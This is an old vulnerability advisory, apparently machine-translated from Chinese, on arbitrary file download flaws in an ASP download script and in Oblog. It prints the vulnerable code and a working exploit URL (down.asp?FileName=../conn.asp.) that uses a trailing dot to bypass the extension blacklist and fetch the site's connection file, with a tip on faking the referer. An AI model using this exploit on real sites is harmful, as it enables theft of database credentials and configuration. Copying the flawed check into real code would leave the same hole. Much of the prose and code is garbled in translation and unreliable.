asp File Download vulnerability-vulnerability warning-the black bar safety net

2009-02-27T00:00:00
ID MYHACK58:62200922332
Type myhack58
Reporter 佚名
Modified 2009-02-27T00:00:00

Description

1:boil the Outlook Const adTypeBinary = 1 FileName = Request. QueryString(”FileName”) if FileName = “” Then Response. Write “invalid file name!” Response. End End if FileExt = Mid(FileName, InStrRev(FileName, “.”) + 1) Select Case the UCase(FileExt) Case “ASP”, “ASA”, “aspX”, “ASAX”, “MDB” Response. Write “illegal operation!” Response. End End Select Response. Clear if lcase(right(FileName,3))=”gif” or lcase(right(FileName,3))=”jpg” or lcase(right(FileName,3))=”png” then Response. ContentType = “image/*” ‘the image file does not appear in the Download dialog else Response. ContentType = “application/ms-download” end if Response. AddHeader “content-disposition”, “attachment; filename=” & GetFileName(Request. QueryString(”FileName”)) Set Stream = server. CreateObject(”ADODB. Stream”) Stream. Type = adTypeBinary Stream. Open Develop this program specifically = FileUploadPath ‘store uploaded files in the directory TrueFileName = develop this program specifically & FileName Stream. LoadFromFile Server. MapPath(TrueFileName) While Not Stream. EOS Response. BinaryWrite Stream. Read(1 0 2 4 * 6 4) Wend

Trojan: http://www.target.com/down.asp?FileName=../conn.asp. (No need to login, using the minibrowser fake the referer) The key is this section of code, use the insterRev function to get the file suffix, originally this is normal, but we added one point after, the interception is the empty suffix. The following judgment on the bypass, can be downloaded.

FileExt = Mid(FileName, InStrRev(FileName, “.”) + 1) Select Case the UCase(FileExt) Case “ASP”, “ASA”, “ASPX”, “ASAX”, “MDB” Response. Write “illegal operation!” Response. End End Select

The suffix is the Last Judgment a. After that, we construct the last one. The back is empty, so not illegal.

insterRev function

First, the last parameter figure it out,is the way of comparison 0 perform a binary comparison. 1 textual comparison 2 based on the implementation included in the database, in this database performs a comparison of information comparison.

InstrRev is from the right to the left start looking,figure out this later on to say.

SearchString =”XXpXXpXXPXXP” X X p X X p X X P X X P 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2

‘A binary comparison from the first 1 0 characters to start. Return of 9. MyPos = InstrRev(SearchString, SearchChar, 1 0, 0) Description:from the second 1 0 single character(X)starts to the left to find,the first position P is 9

‘Text comparison from the last character of the start. Returns 1 and 2. MyPos = InstrRev(SearchString, SearchChar, -1, 1) -1 is from the last location to start looking,from right to left,is the last P,so is 1 2

‘ The default is binary comparison(last argument is omitted). Returns 0. MyPos = InstrRev(SearchString, SearchChar, 8) From the 8 Start,from The to the left,not the uppercase P,so return 0

1: return to digital

2: from right to left search

3: The InStrRev(FileName, “.”) + 1)Get the suffix of the first letter of the location, look here:

<% Dim strTXT,pos strTXT=”www.webjx.com“ pos=instrRev(strTXT,”.”) Response. Write pos %>

We search the start is in reverse order, from the com before a point. Starting characters in length, containing this point, a total of ten characters, the result returned will be 9. Fig. So in conjunction with the Mid function to get the function name when you want to know the suffix of the first letter of the location, so+1! (asp mid function: http://www.fzs8.net/asp/2007-06-10/4209.html)

2:Oblog download vulnerability Carving cards that Path = Trim(Request(”path”))

Then Direct Download

If true_domain = 1 Then downloadFile Server. MapPath(Replace(Path,blogurl,”")),1 else downloadFile Server. MapPath(Path),1 End If

The vulnerability appeared.

TRACE a large cattle Path = Trim(Request(”path”))

And then there is prevention.

If InStr(path,Oblog. CacheConfig(5 6)) > 0 Then ‘Tr4c3 label: note that here, only to determine the user submitted path is contains brought you, is true then call the downloadfile function to download the file downloadFile Server. MapPath(Path),1 End if select Case LCase(Right(strFile, 4)) Case “. asp”,”. mdb”,”. config”,”. js” ‘Tr4c3 label: then look here, remember what? By the way, a few days ago I sent the boiling prospect news system of arbitrary download vulnerability with this inspection method is almost [http://www.tr4c3.com/post/306.html], the use of the method is also similar, and the magical”.” Also come in handy.

The way to get the suffix of the method of recording the following: LCase(Right(strFile, 4))

FileExt = Mid(FileName, InStrRev(FileName, “.”) + 1) Select Case the UCase(FileExt) Case “ASP”, “ASA”, “ASPX”, “ASAX”, “MDB” Response. Write “illegal operation!”